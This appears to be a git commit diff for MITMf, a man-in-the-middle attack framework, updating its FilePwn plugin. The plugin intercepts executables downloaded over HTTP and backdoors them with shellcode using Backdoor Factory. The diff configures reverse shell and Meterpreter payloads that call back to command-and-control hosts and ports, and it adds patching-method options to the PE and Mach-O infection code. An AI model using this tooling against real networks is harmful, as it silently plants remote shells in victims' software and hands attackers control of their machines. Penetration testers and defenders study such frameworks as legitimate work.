Updated FilePwn plugin with latest BDFProxy version

Removed exception handling in mitmf.py since I actually want a traceback

config/mitmf.conf

@@ -363,6 +363,7 @@
 		FileSizeMax = 60000000  # ~60 MB (just under) No patching of files this large
 
 		CompressedFiles = True #True/False
+
 			[[[[LinuxIntelx86]]]]
 			SHELL = reverse_shell_tcp   # This is the BDF syntax
 			HOST = 192.168.1.168 		# The C2
@@ -378,21 +379,25 @@
 			MSFPAYLOAD = linux/x64/shell_reverse_tcp
 
 			[[[[WindowsIntelx86]]]]
-			PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
+			PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
+			# PATCH_METHOD overwrites PATCH_TYPE with jump
+			PATCH_METHOD = automatic
 			HOST = 192.168.1.16
-			PORT = 4444
-			SHELL = reverse_tcp_stager 
+			PORT = 8443
+			SHELL = iat_reverse_tcp_stager_threaded
 			SUPPLIED_SHELLCODE = None
 			ZERO_CERT = False
 			PATCH_DLL = True
 			MSFPAYLOAD = windows/meterpreter/reverse_tcp
 
 			[[[[WindowsIntelx64]]]]
 			PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
+			# PATCH_METHOD overwrites PATCH_TYPE with jump
+			PATCH_METHOD = automatic
 			HOST = 192.168.1.16
 			PORT = 8088
-			SHELL = reverse_shell_tcp
-			SUPPLIED_SHELLCODE = Nonepatchpatchpatch
+			SHELL = iat_reverse_tcp_stager_threaded
+			SUPPLIED_SHELLCODE = None
 			ZERO_CERT = True
 			PATCH_DLL = False
 			MSFPAYLOAD = windows/x64/shell_reverse_tcp

mitmf.py

@@ -149,26 +149,22 @@
 load = []
 
 for p in plugins:
-    try:
 
-        if vars(args)[p.optname] is True:
-            print "|_ %s v%s" % (p.name, p.version)
-            if hasattr(p, 'tree_output') and p.tree_output:
-                for line in p.tree_output:
-                    print "|  |_ %s" % line
-                    p.tree_output.remove(line)
-
-        if getattr(args, p.optname):
-            p.initialize(args)
-            load.append(p)
-
-        if vars(args)[p.optname] is True:
-            if hasattr(p, 'tree_output') and p.tree_output:
-                for line in p.tree_output:
-                    print "|  |_ %s" % line
-
-    except Exception:
-        print "[-] Error loading plugin %s: %s" % (p.name, PrintException())
+    if vars(args)[p.optname] is True:
+        print "|_ %s v%s" % (p.name, p.version)
+        if hasattr(p, 'tree_output') and p.tree_output:
+            for line in p.tree_output:
+                print "|  |_ %s" % line
+                p.tree_output.remove(line)
+
+    if getattr(args, p.optname):
+        p.initialize(args)
+        load.append(p)
+
+    if vars(args)[p.optname] is True:
+        if hasattr(p, 'tree_output') and p.tree_output:
+            for line in p.tree_output:
+                print "|  |_ %s" % line
 
 #Plugins are ready to go, start MITMf
 if args.disproxy:

plugins/FilePwn.py

@@ -78,7 +78,7 @@ class FilePwn(Plugin):
     optname     = "filepwn"
     desc        = "Backdoor executables being sent over http using bdfactory"
     implements  = ["handleResponse"]
-    tree_output = ["BDFProxy v0.2 online"]
+    tree_output = ["BDFProxy v0.3.2 online"]
     version     = "0.2"
     has_opts    = False
 
@@ -123,8 +123,6 @@ def initialize(self, options):
         self.zipblacklist    = self.userConfig['ZIP']['blacklist']
         self.tarblacklist    = self.userConfig['TAR']['blacklist']
 
-        self.output.append("BDFProxy by midnite_runr online")
-
     def convert_to_Bool(self, aString):
         if aString.lower() == 'true':
             return True
@@ -167,6 +165,10 @@ def binaryGrinder(self, binaryFile):
                         elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump':
                             cave_jumping = True
 
+                        # if automatic override
+                        if self.WindowsIntelx64['PATCH_METHOD'].lower() == 'automatic':
+                            cave_jumping = True
+
                         targetFile = pebin.pebin(FILE=binaryFile,
                                                  OUTPUT=os.path.basename(binaryFile),
                                                  SHELL=self.WindowsIntelx64['SHELL'],
@@ -178,6 +180,7 @@ def binaryGrinder(self, binaryFile):
                                                  PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']),
                                                  SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'],
                                                  ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']),
+                                                 PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower()
                                                  )
 
                         result = targetFile.run_this()
@@ -193,6 +196,10 @@ def binaryGrinder(self, binaryFile):
                         elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump':
                             cave_jumping = True
 
+                        # if automatic override
+                        if self.WindowsIntelx86['PATCH_METHOD'].lower() == 'automatic':
+                            cave_jumping = True
+
                         targetFile = pebin.pebin(FILE=binaryFile,
                                                  OUTPUT=os.path.basename(binaryFile),
                                                  SHELL=self.WindowsIntelx86['SHELL'],
@@ -203,7 +210,8 @@ def binaryGrinder(self, binaryFile):
                                                  IMAGE_TYPE=self.WindowsType,
                                                  PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']),
                                                  SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'],
-                                                 ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT'])
+                                                 ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT']),
+                                                 PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower()
                                                  )
 
                         result = targetFile.run_this()
@@ -236,7 +244,7 @@ def binaryGrinder(self, binaryFile):
                                                )
                     result = targetFile.run_this()
 
-            elif binaryHeader[:4].encode('hex') in  ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho
+            elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']:  # Macho
                 targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False)
                 targetFile.support_check()
 
@@ -245,29 +253,29 @@ def binaryGrinder(self, binaryFile):
                 if targetFile.FAT_FILE is True:
                     if self.FatPriority == 'x86':
                         targetFile = machobin.machobin(FILE=binaryFile,
-                                                   OUTPUT = os.path.basename(binaryFile),
-                                                   SHELL=self.MachoIntelx86['SHELL'],
-                                                   HOST=self.MachoIntelx86['HOST'],
-                                                   PORT=int(self.MachoIntelx86['PORT']),
-                                                   SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
-                                                   FAT_PRIORITY=self.FatPriority
-                                                   )
+                                                       OUTPUT=os.path.basename(binaryFile),
+                                                       SHELL=self.MachoIntelx86['SHELL'],
+                                                       HOST=self.MachoIntelx86['HOST'],
+                                                       PORT=int(self.MachoIntelx86['PORT']),
+                                                       SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
+                                                       FAT_PRIORITY=self.FatPriority
+                                                       )
                         result = targetFile.run_this()
 
                     elif self.FatPriority == 'x64':
                         targetFile = machobin.machobin(FILE=binaryFile,
-                                                   OUTPUT = os.path.basename(binaryFile),
-                                                   SHELL=self.MachoIntelx64['SHELL'],
-                                                   HOST=self.MachoIntelx64['HOST'],
-                                                   PORT=int(self.MachoIntelx64['PORT']),
-                                                   SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
-                                                   FAT_PRIORITY=self.FatPriority
-                                                   )
+                                                       OUTPUT=os.path.basename(binaryFile),
+                                                       SHELL=self.MachoIntelx64['SHELL'],
+                                                       HOST=self.MachoIntelx64['HOST'],
+                                                       PORT=int(self.MachoIntelx64['PORT']),
+                                                       SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
+                                                       FAT_PRIORITY=self.FatPriority
+                                                       )
                         result = targetFile.run_this()
-          
-                elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7': 
+
+                elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7':
                     targetFile = machobin.machobin(FILE=binaryFile,
-                                                   OUTPUT = os.path.basename(binaryFile),
+                                                   OUTPUT=os.path.basename(binaryFile),
                                                    SHELL=self.MachoIntelx86['SHELL'],
                                                    HOST=self.MachoIntelx86['HOST'],
                                                    PORT=int(self.MachoIntelx86['PORT']),
@@ -276,17 +284,17 @@ def binaryGrinder(self, binaryFile):
                                                    )
                     result = targetFile.run_this()
 
-                elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007': 
+                elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007':
                     targetFile = machobin.machobin(FILE=binaryFile,
-                                                   OUTPUT = os.path.basename(binaryFile),
+                                                   OUTPUT=os.path.basename(binaryFile),
                                                    SHELL=self.MachoIntelx64['SHELL'],
                                                    HOST=self.MachoIntelx64['HOST'],
                                                    PORT=int(self.MachoIntelx64['PORT']),
                                                    SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
                                                    FAT_PRIORITY=self.FatPriority
                                                    )
                     result = targetFile.run_this()
-          
+
             self.patched.put(result)
             return
 
@@ -464,7 +472,7 @@ def zip_files(self, aZipFile):
         patchCount = 0
 
         wasPatched = False
-            
+
         for info in zippyfile.infolist():
             print "[*] >>> Next file in zipfile:", info.filename